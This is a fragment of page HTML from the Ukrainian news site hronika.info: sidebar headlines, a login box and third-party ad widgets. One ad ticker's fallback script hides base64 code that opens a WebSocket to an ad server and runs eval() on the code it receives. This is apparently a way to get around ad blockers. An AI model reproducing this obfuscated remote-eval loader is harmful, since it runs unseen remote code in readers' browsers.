	<a href="http://hronika.info/mir/401469-megan-markl-i-princ-garri-pribyli-v-marokko-s-oficialnym-vizitom.html"><strong title="Меган Маркл и принц Гарри прибыли в Марокко с официальным визитом">Меган Маркл и принц Гарри прибыли в Марокко с официальным визитом</strong><b>46</b></a>
</div><div class="newsr_1">
    <span>24.02-15:19</span>
	<a href="http://hronika.info/obwestvo/401468-sinoptik-rasskazal-kakoy-budet-vesna-v-ukraine.html"><strong title="Синоптик рассказал, какой будет весна в Украине">Синоптик рассказал, какой будет весна в Украине</strong><b>64</b></a>
</div><div class="newsr_1">
    <span>24.02-15:15</span>
	<a href="http://hronika.info/avto/401467-opel-mokka-budut-vypuskat-vo-francii.html"><strong title="Opel Mokka будут выпускать во Франции">Opel Mokka будут выпускать во Франции</strong><b>75</b></a>
</div><div class="newsr_1">
    <span>24.02-15:11</span>
	<a href="http://hronika.info/kriminal/401466-na-odeschine-dva-policeyskih-postradali-v-dtp.html"><strong title="На Одесчине два полицейских пострадали в ДТП">На Одесчине два полицейских пострадали в ДТП</strong><b>119</b></a>
</div><div class="newsr_1">
    <span>24.02-15:05</span>
	<a href="http://hronika.info/videonovosti/401465-v-kieve-sostoyalsya-mini-marafon-snow-run-video.html"><strong title="В Киеве состоялся мини-марафон Snow Run. Видео">В Киеве состоялся мини-марафон Snow Run. Видео</strong><b>136</b></a>
</div><div class="newsr_1">
    <span>24.02-15:01</span>
	<a href="http://hronika.info/fotoreportazhi/401463-koreec-risuet-nastoyaschie-shedevry-na-kofeynoy-pene-foto.html"><strong title="Кореец рисует настоящие шедевры на кофейной пене. Фото">Кореец рисует настоящие шедевры на кофейной пене. Фото</strong><b>384</b></a>
</div><div class="newsr_1">
    <span>24.02-14:57</span>
	<a href="http://hronika.info/tehnologii/401462-xiaomi-oficialno-predstavila-mi-mix-3-5g.html"><strong title="Xiaomi официально представила Mi Mix 3 5G">Xiaomi официально представила Mi Mix 3 5G</strong><b>143</b></a>
</div><div class="newsr_1">
    <span>24.02-14:53</span>
	<a href="http://hronika.info/neverojatnoe/401461-uchenym-udalos-obnaruzhit-iskopaemoe-drevnee-suschestvo.html"><strong title="Ученым удалось обнаружить ископаемое древнее существо">Ученым удалось обнаружить ископаемое древнее существо</strong><b>159</b></a>
</div><div class="newsr_1">
    <span>24.02-14:49</span>
	<a href="http://hronika.info/mir/401460-kipr-zayavil-chto-tureckie-voennye-narushayut-granicu.html"><strong title="Кипр заявил, что турецкие военные нарушают границу">Кипр заявил, что турецкие военные нарушают границу</strong><b>237</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/401229-timoshenko-grozitsya-kinut-za-reshetku-druzey-poroshenko.html"><img src="/posters/300_131_70_1/uploads/posts/2019-02/thumbs/1550929439_timoshenko-grozitsya-kinut-za-reshetku-druzey-poroshenko.jpg" alt="Тимошенко грозится кинуть за решетку "друзей Порошенко"" title="Тимошенко грозится кинуть за решетку "друзей Порошенко"" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/401229-timoshenko-grozitsya-kinut-za-reshetku-druzey-poroshenko.html">Тимошенко грозится кинуть за решетку "друзей Порошенко"</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/401162-poroshenko-nazval-malevicha-ukrainskim-avangardistom-v-rossii-nedovolny.html"><img src="/posters/74_74_70_1/uploads/posts/2019-02/thumbs/1550915383_poroshenko-nazval-malevicha-ukrainskim-avangardistom-v-rossii-nedovolny.jpg" alt="Порошенко назвал Малевича украинским авангардистом, в России недовольны" title="Порошенко назвал Малевича украинским авангардистом, в России недовольны" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/401018-avakov-utverzhdaet-chto-protiv-nego-gotovyatsya-provokacii.html"><img src="/posters/74_74_70_1/uploads/posts/2019-02/thumbs/1550856030_39_tn.jpg" alt="Аваков утверждает, что против него готовятся провокации" title="Аваков утверждает, что против него готовятся провокации" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/400985-sap-napravila-v-sud-delo-protiv-ministra-infrastruktury.html"><img src="/posters/74_74_70_1/uploads/posts/2019-02/thumbs/1550848170_omelyan.jpg" alt="САП направила в суд дело против министра инфраструктуры" title="САП направила в суд дело против министра инфраструктуры" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/400963-dengi-okruzheniya-yanukovicha-perechislili-v-gosbyudzhet.html"><img src="/posters/74_74_70_1/uploads/posts/2019-02/thumbs/1550845027_yanukovich.jpg" alt="Деньги окружения Януковича перечислили в госбюджет" title="Деньги окружения Януковича перечислили в госбюджет" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1938.jpg" />
        <div>22.02.2019|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%90%D0%BD%D0%B4%D1%80%D0%B5%D0%B9+%D0%AE%D1%81%D0%BE%D0%B2', 'http://hronika.info/user/%D0%90%D0%BD%D0%B4%D1%80%D0%B5%D0%B9+%D0%AE%D1%81%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%90%D0%BD%D0%B4%D1%80%D0%B5%D0%B9+%D0%AE%D1%81%D0%BE%D0%B2/">Андрей Юсов</a></div>
    	<strong><a href="http://hronika.info/mnenia/400687-navscho-potrbn-da-dlya-notarusv.html">Навіщо потрібні «ДАІ» для нотаріусів</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1877.jpg" />
        <div>22.02.2019|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2', 'http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%9A%D0%B8%D1%80%D0%B8%D0%BB%D0%BB+%D0%A1%D0%B0%D0%B7%D0%BE%D0%BD%D0%BE%D0%B2/">Кирилл Сазонов</a></div>
    	<strong><a href="http://hronika.info/mnenia/400686-rossiya-deportiruet-terroristov.html">Россия депортирует террористов</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1885.jpg" />
        <div>22.02.2019|15:30</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%9C%D0%B0%D0%B3%D0%B4%D0%B0/">Евгений Магда</a></div>
    	<strong><a href="http://hronika.info/mnenia/400685-gbridna-pyatirchka-pdsumki.html">Гібридна п’ятирічка: підсумки</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1929.jpg" />
        <div>22.02.2019|14:45</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%AF%D0%BD+%D0%92%D0%B0%D0%BB%D0%B5%D1%82%D0%BE%D0%B2', 'http://hronika.info/user/%D0%AF%D0%BD+%D0%92%D0%B0%D0%BB%D0%B5%D1%82%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%AF%D0%BD+%D0%92%D0%B0%D0%BB%D0%B5%D1%82%D0%BE%D0%B2/">Ян Валетов</a></div>
    	<strong><a href="http://hronika.info/mnenia/400683-propaganda-sposobna-tvorit-chudesa.html">Пропаганда способна творить чудеса</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
    
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите E-Mail:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	
	
	
	
	
	
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
        <!-- noindex -->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--/ noindex -->  
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<div id="FMg6hQON63UZxhcgPUb0" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/fR37/h0.js" ></script>
<script id="r17725" type="text/javascript">
    (function() {
        var worker17725,
            tickerID = 17725,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17725.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17725.postMessage(data);
                }

                worker17725 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17725.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17725.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
<div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
<center><script>
(function(c,o,u,n,t,e,r){
r = c[u](o); r[n] = t; r.async = 1;
r.onload = function(){c['AliExpressBannerGlobalObject'](e)};
c.body.appendChild(r);
})(document, 'script', 'createElement', 'src', '//alishop6.ru/902dy/src.js');
</script>

<div class="some_class"></div>
</center>
    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/401470-52-letnyaya-olga-sumskaya-poradovala-cvetuschim-vidom.html"><span>24.02-15:27</span>
	<strong title="52-летняя Ольга Сумская порадовала цветущим видом">52-летняя Ольга Сумская порадовала цветущим видом</strong></a><b>0</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/mir/401469-megan-markl-i-princ-garri-pribyli-v-marokko-s-oficialnym-vizitom.html"><span>24.02-15:23</span>
	<strong title="Меган Маркл и принц Гарри прибыли в Марокко с официальным визитом">Меган Маркл и принц Гарри прибыли в Марокко с официальным визитом</strong></a><b>46</b><div class="category_lastn_date" title="Мир">&nbsp;&nbsp;<a href="http://hronika.info/mir/">Мир</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/obwestvo/401468-sinoptik-rasskazal-kakoy-budet-vesna-v-ukraine.html"><span>24.02-15:19</span>
	<strong title="Синоптик рассказал, какой будет весна в Украине">Синоптик рассказал, какой будет весна в Украине</strong></a><b>64</b><div class="category_lastn_date" title="Общество">&nbsp;&nbsp;<a href="http://hronika.info/obwestvo/">Общество</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/401467-opel-mokka-budut-vypuskat-vo-francii.html"><span>24.02-15:15</span>
	<strong title="Opel Mokka будут выпускать во Франции">Opel Mokka будут выпускать во Франции</strong></a><b>75</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kriminal/401466-na-odeschine-dva-policeyskih-postradali-v-dtp.html"><span>24.02-15:11</span>
	<strong title="На Одесчине два полицейских пострадали в ДТП">На Одесчине два полицейских пострадали в ДТП</strong></a><b>119</b><div class="category_lastn_date" title="Происшествия">&nbsp;&nbsp;<a href="http://hronika.info/kriminal/">Происшествия</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/401465-v-kieve-sostoyalsya-mini-marafon-snow-run-video.html"><span>24.02-15:05</span>
	<strong title="В Киеве состоялся мини-марафон Snow Run. Видео">В Киеве состоялся мини-марафон Snow Run. Видео</strong></a><b>136</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/tehnologii/401462-xiaomi-oficialno-predstavila-mi-mix-3-5g.html"><span>24.02-14:57</span>
	<strong title="Xiaomi официально представила Mi Mix 3 5G">Xiaomi официально представила Mi Mix 3 5G</strong></a><b>143</b><div class="category_lastn_date" title="Технологии">&nbsp;&nbsp;<a href="http://hronika.info/tehnologii/">Технологии</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/401461-uchenym-udalos-obnaruzhit-iskopaemoe-drevnee-suschestvo.html"><span>24.02-14:53</span>
	<strong title="Ученым удалось обнаружить ископаемое древнее существо">Ученым удалось обнаружить ископаемое древнее существо</strong></a><b>159</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/mir/401460-kipr-zayavil-chto-tureckie-voennye-narushayut-granicu.html"><span>24.02-14:49</span>
	<strong title="Кипр заявил, что турецкие военные нарушают границу">Кипр заявил, что турецкие военные нарушают границу</strong></a><b>237</b><div class="category_lastn_date" title="Мир">&nbsp;&nbsp;<a href="http://hronika.info/mir/">Мир</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/401459-nazvana-dieta-na-kotoroy-pohudela-keyt-middlton.html"><span>24.02-14:45</span>
	<strong title="Названа диета, на которой похудела Кейт Миддлтон">Названа диета, на которой похудела Кейт Миддлтон</strong></a><b>202</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/400070-nazvany-privychki-kotorye-vliyayut-na-davlenie.html"><span>19.02-22:42</span>
	<strong title="Названы привычки, которые влияют на давление">Названы привычки, которые влияют на давление</strong></a><b>47715</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/tehnologii/401119-microsoft-sdelala-carskiy-podarok-polzovatelyam-windows-10.html"><span>23.02-09:41</span>
	<strong title="Microsoft сделала "царский подарок" пользователям Windows 10">Microsoft сделала "царский подарок" пользователям Windows 10</strong></a><b>22330</b><div class="category_lastn_date" title="Технологии">&nbsp;&nbsp;<a href="http://hronika.info/tehnologii/">Технологии</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/400259-smeh-na-uzhin-svezhaya-podborka-otlichnyh-anekdotov.html"><span>20.02-19:50</span>
	<strong title="Смех на ужин: свежая подборка отличных анекдотов">Смех на ужин: свежая подборка отличных анекдотов</strong></a><b>20150</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/399626-nelepye-byuti-trendy-vyzyvayuschie-smeh-i-nedoumenie.html"><span>18.02-21:50</span>
	<strong title="Нелепые бьюти-тренды, вызывающие смех и недоумение">Нелепые бьюти-тренды, вызывающие смех и недоумение</strong></a><b>18086</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/400555-ukraincam-napomnili-kakie-medicinskie-operacii-delayut-besplatno.html"><span>21.02-13:18</span>
	<strong title="Украинцам напомнили, какие медицинские операции делают бесплатно">Украинцам напомнили, какие медицинские операции делают бесплатно</strong></a><b>16342</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/399940-vrachi-obyasnili-komu-polezna-obuv-na-kablukah.html"><span>19.02-14:40</span>
	<strong title="Врачи объяснили, кому полезна обувь на каблуках">Врачи объяснили, кому полезна обувь на каблуках</strong></a><b>15265</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/399788-kamera-na-bortu-mks-zasnyala-letayuschuyu-tarelku.html"><span>19.02-08:09</span>
	<strong title="Камера на борту МКС засняла летающую тарелку">Камера на борту МКС засняла летающую тарелку</strong></a><b>12901</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/400969-i-smeh-i-greh-popytka-parikmahera-povtorit-prichesku-zakonchilas-fiasko.html"><span>22.02-16:31</span>
	<strong title="И смех, и грех: попытка парикмахера повторить прическу закончилась фиаско">И смех, и грех: попытка парикмахера повторить прическу закончилась фиаско</strong></a><b>12772</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/399511-voditel-sluchayno-zasnyal-teleportaciyu-cheloveka.html"><span>18.02-10:18</span>
	<strong title="Водитель случайно заснял "телепортацию" человека">Водитель случайно заснял "телепортацию" человека</strong></a><b>12145</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/400777-kotyata-i-koshki-kotorye-ochen-lyubyat-obnimatsya.html"><span>22.02-03:48</span>
	<strong title="Котята и кошки, которые очень любят обниматься">Котята и кошки, которые очень любят обниматься</strong></a><b>11922</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <h3>Интересные новости</h3>
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <!-- -------------Informer block------------- -->
<div id="svtn_inf_49" class="svtn_inf" data-tisid="49"></div>
<!-- ---------------------------------------- -->
<!-- -------------Before </body>------------- -->
<script async="async">
function nmbrsvtn(nma){
  var nmc=false;
  function nmr(){
      if(nmc)return;
      nmc=true;
      nma();
  }
  if(document.addEventListener){
      document.addEventListener("DOMContentLoaded",function(){nmr();},false)}else if   (document.attachEvent){if(document.documentElement.doScroll&&window==window.top){function nmts(){if(nmc)return;if(!document.body)return;try{document.documentElement.doScroll("left");nmr();}catch(e){setTimeout(nmts,100);}}nmts();}document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){nmr();}})}if(window.addEventListener)window.addEventListener("load",nmr,false);else if(window.attachEvent)window.attachEvent("onload",nmr);window.onload=nmr;
}

function start_svtn_tis() {  
var el = document.getElementsByClassName("svtn_inf");
var arr_inf = "";
for (var i = 0; i < el.length; i++) {
if (i == el.length - 1) {
arr_inf = arr_inf + el[i].getAttribute("data-tisid");
}else{
arr_inf = arr_inf + el[i].getAttribute("data-tisid") + "_";
}
}
var el2 = document.getElementsByTagName("body");
var svtnscrpt = document.createElement('script');
svtnscrpt.type = 'text/javascript';
svtnscrpt.src = 'https://svitnews.com/V/get/inf/' + arr_inf;
svtnscrpt.async = 'async';
 el2[0].appendChild(svtnscrpt);
return;
}
function pre_start_svtn_tis(){
if(window.flag_svtn === true){
return;
}
window.flag_svtn = true;

start_svtn_tis();
}
nmbrsvtn(pre_start_svtn_tis);
</script>  
<!-- ---------------------------------------- -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
